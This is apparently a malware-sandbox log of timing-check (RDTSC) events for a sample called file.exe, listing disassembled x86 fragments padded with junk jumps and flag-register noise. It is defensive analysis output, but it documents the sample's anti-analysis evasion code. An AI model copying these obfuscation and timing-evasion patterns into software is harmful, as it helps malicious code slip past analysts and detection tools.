Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0335 second address: 49C037F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F60A4E98F08h 0x00000008 sbb cl, FFFFFFA8h 0x0000000b jmp 00007F60A4E98EFBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov cx, AB9Fh 0x00000017 popad 0x00000018 pop esi 0x00000019 jmp 00007F60A4E98F02h 0x0000001e leave 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 mov edx, ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0080 second address: 49B0084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0084 second address: 49B008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B008A second address: 49B0132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5D3AA6ADh 0x00000010 jmp 00007F60A4BE8BE0h 0x00000015 call 00007F60A4BE8BD9h 0x0000001a jmp 00007F60A4BE8BE0h 0x0000001f push eax 0x00000020 jmp 00007F60A4BE8BDBh 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 jmp 00007F60A4BE8BE9h 0x0000002e mov eax, dword ptr [eax] 0x00000030 pushad 0x00000031 pushad 0x00000032 mov dx, FC80h 0x00000036 jmp 00007F60A4BE8BE9h 0x0000003b popad 0x0000003c mov eax, 5FEB3747h 0x00000041 popad 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F60A4BE8BDFh 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0132 second address: 49B0138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0138 second address: 49B016A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F60A4BE8BE7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B016A second address: 49B01FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f pushad 0x00000010 movzx eax, dx 0x00000013 movsx edx, si 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F60A4E98EFEh 0x0000001f sbb ch, 00000048h 0x00000022 jmp 00007F60A4E98EFBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F60A4E98F08h 0x0000002e or esi, 423DC6A8h 0x00000034 jmp 00007F60A4E98EFBh 0x00000039 popfd 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d popad 0x0000003e nop 0x0000003f jmp 00007F60A4E98EFCh 0x00000044 sub esp, 18h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B01FA second address: 49B01FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B01FE second address: 49B0204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0204 second address: 49B02D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c mov ecx, edx 0x0000000e pop ebx 0x0000000f pushfd 0x00000010 jmp 00007F60A4BE8BE6h 0x00000015 add cx, ADC8h 0x0000001a jmp 00007F60A4BE8BDBh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F60A4BE8BDFh 0x00000029 sub esi, 77FCE40Eh 0x0000002f jmp 00007F60A4BE8BE9h 0x00000034 popfd 0x00000035 jmp 00007F60A4BE8BE0h 0x0000003a popad 0x0000003b xchg eax, ebx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F60A4BE8BDEh 0x00000043 sub ah, FFFFFFB8h 0x00000046 jmp 00007F60A4BE8BDBh 0x0000004b popfd 0x0000004c mov eax, 578481EFh 0x00000051 popad 0x00000052 xchg eax, esi 0x00000053 jmp 00007F60A4BE8BE2h 0x00000058 push eax 0x00000059 jmp 00007F60A4BE8BDBh 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B02D9 second address: 49B02E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B02E0 second address: 49B02FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4BE8BE9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B02FD second address: 49B03EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F60A4E98F03h 0x00000013 jmp 00007F60A4E98F03h 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F60A4E98F09h 0x00000020 xchg eax, edi 0x00000021 pushad 0x00000022 mov bh, al 0x00000024 mov dh, 92h 0x00000026 popad 0x00000027 mov eax, dword ptr [769B4538h] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F60A4E98EFEh 0x00000033 adc si, 2BF8h 0x00000038 jmp 00007F60A4E98EFBh 0x0000003d popfd 0x0000003e mov ebx, ecx 0x00000040 popad 0x00000041 xor dword ptr [ebp-08h], eax 0x00000044 jmp 00007F60A4E98F02h 0x00000049 xor eax, ebp 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007F60A4E98F07h 0x00000052 and eax, 10598D1Eh 0x00000058 jmp 00007F60A4E98F09h 0x0000005d popfd 0x0000005e pushad 0x0000005f push eax 0x00000060 pop edi 0x00000061 push esi 0x00000062 pop edx 0x00000063 popad 0x00000064 popad 0x00000065 nop 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F60A4E98EFBh 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B03EE second address: 49B040E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F60A4BE8BDEh 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B040E second address: 49B0412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0412 second address: 49B042F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B042F second address: 49B043F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4E98EFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B043F second address: 49B049B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b jmp 00007F60A4BE8BE7h 0x00000010 mov dword ptr fs:[00000000h], eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F60A4BE8BE4h 0x0000001d and esi, 35409498h 0x00000023 jmp 00007F60A4BE8BDBh 0x00000028 popfd 0x00000029 mov edi, esi 0x0000002b popad 0x0000002c mov dword ptr [ebp-18h], esp 0x0000002f pushad 0x00000030 movzx ecx, di 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B049B second address: 49B052C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F60A4E98F06h 0x00000008 and esi, 029F5628h 0x0000000e jmp 00007F60A4E98EFBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov eax, dword ptr fs:[00000018h] 0x0000001d jmp 00007F60A4E98F06h 0x00000022 mov ecx, dword ptr [eax+00000FDCh] 0x00000028 jmp 00007F60A4E98F00h 0x0000002d test ecx, ecx 0x0000002f jmp 00007F60A4E98F00h 0x00000034 jns 00007F60A4E98F42h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F60A4E98F07h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B052C second address: 49B0532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0532 second address: 49B0536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0536 second address: 49B057B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, ecx 0x0000000d jmp 00007F60A4BE8BE6h 0x00000012 mov ecx, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F60A4BE8BE7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B057B second address: 49B0593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4E98F04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0179 second address: 49A01D9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F60A4BE8BE4h 0x00000008 sbb esi, 27D476C8h 0x0000000e jmp 00007F60A4BE8BDBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F60A4BE8BE8h 0x0000001c add ax, F928h 0x00000021 jmp 00007F60A4BE8BDBh 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx edx, si 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A01D9 second address: 49A0216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F60A4E98F09h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov esi, 3E79E083h 0x00000016 pushad 0x00000017 mov ebx, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0216 second address: 49A024C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 jmp 00007F60A4BE8BDEh 0x0000000d sub esp, 2Ch 0x00000010 pushad 0x00000011 mov cl, 08h 0x00000013 mov edi, 3A4CADDEh 0x00000018 popad 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F60A4BE8BE1h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A024C second address: 49A02BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007F60A4E98F03h 0x0000000b or ch, FFFFFFEEh 0x0000000e jmp 00007F60A4E98F09h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov eax, ebx 0x0000001f pushfd 0x00000020 jmp 00007F60A4E98EFFh 0x00000025 add ch, FFFFFFFEh 0x00000028 jmp 00007F60A4E98F09h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A02BB second address: 49A02CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4BE8BDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A02CB second address: 49A02CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0327 second address: 49A032D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A032D second address: 49A0387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F60A4E98F01h 0x00000010 sub edi, edi 0x00000012 jmp 00007F60A4E98F07h 0x00000017 inc ebx 0x00000018 pushad 0x00000019 call 00007F60A4E98F04h 0x0000001e mov ax, B8C1h 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 movsx edi, cx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0387 second address: 49A03D8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F60A4BE8BE6h 0x00000008 adc si, 2808h 0x0000000d jmp 00007F60A4BE8BDBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test al, al 0x00000018 jmp 00007F60A4BE8BE6h 0x0000001d je 00007F60A4BE8DEAh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A03D8 second address: 49A03DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A03DE second address: 49A0418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c pushad 0x0000000d mov cx, B29Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F60A4BE8BE8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0418 second address: 49A041C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0450 second address: 49A0454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0454 second address: 49A0476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 mov di, ax 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F60A4E98F03h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A04C1 second address: 49A04DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3061BB4Ah 0x00000008 jmp 00007F60A4BE8BDBh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test eax, eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A04DF second address: 49A04E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A04E5 second address: 49A04EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A04EB second address: 49A04EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A04EF second address: 49A0516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F6116BA6B6Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F60A4BE8BE7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0516 second address: 49A053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F60A4E98FA3h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A053F second address: 49A0543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0543 second address: 49A0549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0549 second address: 49A054E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A054E second address: 49A05D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F60A4E98EFEh 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [ebp-14h], edi 0x00000010 jmp 00007F60A4E98F01h 0x00000015 jne 00007F6116E56E19h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F60A4E98F03h 0x00000024 sbb si, F41Eh 0x00000029 jmp 00007F60A4E98F09h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F60A4E98F00h 0x00000035 adc esi, 101C7A18h 0x0000003b jmp 00007F60A4E98EFBh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A05D8 second address: 49A05DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A05DF second address: 49A05FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, dword ptr [ebp+08h] 0x0000000a jmp 00007F60A4E98EFCh 0x0000000f lea eax, dword ptr [ebp-2Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A05FE second address: 49A0602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0602 second address: 49A0606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0606 second address: 49A060C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A060C second address: 49A065B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, di 0x00000010 pushfd 0x00000011 jmp 00007F60A4E98F09h 0x00000016 sbb ah, 00000076h 0x00000019 jmp 00007F60A4E98F01h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A065B second address: 49A066B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4BE8BDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A066B second address: 49A0690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60A4E98F08h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0690 second address: 49A0696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0696 second address: 49A069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A069C second address: 49A06A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A06A0 second address: 49A06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A06AF second address: 49A06B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A06B5 second address: 49A06E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 32D93335h 0x00000008 mov edx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f mov ecx, 7A6881E9h 0x00000014 push ecx 0x00000015 movsx edi, ax 0x00000018 pop ecx 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F60A4E98F03h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990DBF second address: 4990DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990DC5 second address: 4990DF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60A4E98F04h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990DF5 second address: 4990DFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 02BA8DC4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990DFF second address: 4990EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushad 0x0000000a mov esi, ebx 0x0000000c mov cx, di 0x0000000f popad 0x00000010 jmp 00007F60A4E98EFDh 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F60A4E98EFCh 0x0000001f xor si, 69A8h 0x00000024 jmp 00007F60A4E98EFBh 0x00000029 popfd 0x0000002a pushad 0x0000002b mov ax, B5B5h 0x0000002f pushfd 0x00000030 jmp 00007F60A4E98F02h 0x00000035 xor ax, DC08h 0x0000003a jmp 00007F60A4E98EFBh 0x0000003f popfd 0x00000040 popad 0x00000041 popad 0x00000042 xchg eax, ecx 0x00000043 pushad 0x00000044 movzx ecx, di 0x00000047 pushfd 0x00000048 jmp 00007F60A4E98F01h 0x0000004d sub esi, 4DDCFF26h 0x00000053 jmp 00007F60A4E98F01h 0x00000058 popfd 0x00000059 popad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F60A4E98EFCh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990EA8 second address: 4990F1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F60A4BE8BE1h 0x00000009 sub ecx, 482C9F36h 0x0000000f jmp 00007F60A4BE8BE1h 0x00000014 popfd 0x00000015 mov bx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ecx 0x0000001c pushad 0x0000001d mov eax, 2B3B801Fh 0x00000022 pushfd 0x00000023 jmp 00007F60A4BE8BE4h 0x00000028 add ecx, 4F218588h 0x0000002e jmp 00007F60A4BE8BDBh 0x00000033 popfd 0x00000034 popad 0x00000035 mov dword ptr [ebp-04h], 55534552h 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov dx, 71F6h 0x00000043 mov si, di 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B07 second address: 49A0B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B23 second address: 49A0B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B27 second address: 49A0B3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
